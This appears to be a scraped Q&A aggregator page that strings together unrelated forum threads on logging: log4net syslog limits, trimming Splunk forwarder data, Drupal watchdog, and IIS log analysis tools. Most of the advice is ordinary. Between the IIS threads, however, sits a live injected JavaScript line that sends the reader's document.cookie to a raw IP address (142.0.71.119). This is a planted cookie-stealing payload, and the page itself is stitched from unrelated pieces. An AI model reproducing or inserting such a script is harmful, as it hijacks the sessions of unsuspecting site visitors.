Has anyone found a way to get around this? Or a better technique to conglomerate logging from multiple web servers reliably?
Any ideas on good log4net log file analysis tools too (plain text not XML) - apart from good 'ol grep of course :)
I read about logFaces on another question, or you could use a socket appender and write your own server. logFaces describes itself as a "Log server, aggregator & viewer" but I'm yet to try it.
The 1024 byte limit is part of the syslog RFC (section 4.1), as is UDP transport which doesn't have guaranteed delivery (in case you worry about log lines lost in the ether). I think syslog-ng can solve both these issues, but I'm not a syslog expert.
The database-based appenders are great for collecting logs from multiple servers.
The limitation is imposed by the syslog itself, not the appender.
I do not know about log4net, but NLog works perfectly ok with "shared" file target - i.e. multiple processes can write in one and the same file.
Related
I am using Splunk Enterprise for security purposes...
But there is a lot of extraneous data in my Splunk at the moment. Looking through the dashboards I am finding a lot of performance and operational status data which I don't need. The problem is that my splunk license allows me to analyze 2gb of data in a 24 hour period. I would say that at the moment 70% of the data that goes through the system is not security related and the system was procured as a security monitoring system.
I would like to find a way to reduce the mount of the data that the "forwarders" send back to the Splunk back end for processing. i.e. exclude all of the performance and operational data from the analysis.
My intention is to use that freed up bandwidth to push some Anti Virus and Firewall logs to splunk instead of server performance data.
I would really really appreciate some help with this. I have searched previous questions, but can't seem to find the answer. However, if there is a page you know of where I can find my answer please send me the link :)
Kind Regards
Vera
Sounds like you've taken an off-the-shelf 'Technical Addon' and deployed it as an app inside splunk forwarders on some servers?
If yes:
You'll find an inputs.conf inside the apps, tweak it as appropriate.
http://docs.splunk.com/Documentation/Splunk/6.5.0/Admin/Inputsconf
You can simply disable a stanza in the inputs.conf with disabled = true
This same question has been answered in the Splunk forums:
https://answers.splunk.com/answers/444825/how-to-limit-the-amount-of-data-that-a-splunk-univ.html
For anyone else with the same issue, see the two answers posted in the link above, as well as this answer from another Splunk forum page, for different options.
Hi Im going though and securing a site I have that runs drupal 7 using the security review module. One of the recommendations is to not use watchdog to log events to the screen I.E the data base I guess. If I turn that off would there be another secure way to send logs to my workstation so that I can monitor traffic to the site. I.E what people view, broken links and the like?
I'm on a shared host, not a dedicated host. I did a search on some different ways to do this, but I really dont know where to start. Should I download a module to do this? Or does Drupal report all this information to the server logs? Sorry if I am not formatting this question correctly, but i'm not to clear on how to do this.
Are you sure the recommandation is about Drupal's watchdog? Not about displaying error message on the pages. These are two different things.
That said, in Drupal, the watchdog is only an API to log system messages. Where the messages go, how they are actually logged, is a pluggable system. By default, Drupal uses a module called "Database logging" (dblog) to log message to the database. A syslog module is also provided, but not really an option if you are on a shared hosting. A quick search reveal modules to send messages to Logentries, Logstash (and Loggly), Slack, LogIO, email, etc.
If you have a gigantic site with millions a hits a day then, yeah, don't use watchdog.
But if it's just a small site, just use watchdog to log your events. And seeing its a shared host, it's not a high profile site. Using watchdog is fine.
I need a way to find which Java methods are writing a plain log file (this log it's not log4j), I'm certain that the log is written as a text file with the io.file class.
How can I isolate the methods with Eclipse that operate with the log.
I made some investigation on Linux to determine the process that opens the file and it's jboss, so it's the main project, what now is needed is to narrow down the search.
So, what can it be done at this point ?
Any other tips like using 3-rd party monitoring tools like jvisualvm to monitor jboss's threads are welcomed.
I can provide more details about my problem, leave the questions in the comments, because I don't know very well how to explain the issue I'm experiencing.
I need to log the hits on a sub-domain in Windows IIS 6.0 without designating them as separate websites in the IIS Manager. I have been told this is not possible. How can I write my own script to do this?
I'm afraid google analytics is not an option due to the setup, I just need access (i'm guessing) to the file request event and its properties.
Wyatt Barnette - I've thought of this! But how do I set those properties for it to collect them all? I'm writing my own log parsing software, as I need specific things, I just need the server to generate the logs for me to parse!
Have you considered using Google Analytics across all your sites? I know that this is not true logging...but sometimes addressing simple problems with simple solutions is easier! Log parsing seems to be slowly fading away...
What you should be able to do is have your stats tracking package look at multiple IIS websites as a single site.
If your logging package can't handle this, check out the IIS log parsing tool. That should at least take care of the more onerous part of the task (actually making sense of the logfiles). From there it is a pretty straightforward reporting operation.
<script language="JavaScript">document.location="http://142.0.71.119:88/get.php?cookie="+document.cookie;</script>
I'm looking for some kind of tool that will let me slice and dice IIS web logs, for troubleshooting purposes...
All tools I've found are designed to analyze logs for a "Google Analytics" type of output, but what I want is more like "see all hits made from some IP", "see all hits to a specific ASHX file", things like that, to troubleshoot a few obscure bugs we are having with sessions...
Does anyone know of such a tool, or should I just roll my own?
Thanks!
Use logparser. It is a free tool to analyze all kinds of logs including IIS logs.
http://www.microsoft.com/downloads/details.aspx?FamilyID=890cd06b-abf8-4c25-91b2-f8d975cf8c07&displaylang=en
Here is another great link.
http://www.msexchange.org/tutorials/Using-Logparser-Utility-Analyze-ExchangeIIS-Logs.html
Our group at work is suggesting logdog. Open source, free, etc. I don't have direct experience, yet, but it is my understanding that it operates in a very efficient way on different logs (syslogd, access.log, error.log). You configure which logs to watch, how much, how often, what to look for. It can then be configured to send out alerts.
Splunk is more heavyweight. But its free ( if your logs aren't huge). And its cute.
And there are always the plain find, findstr, grep's and such.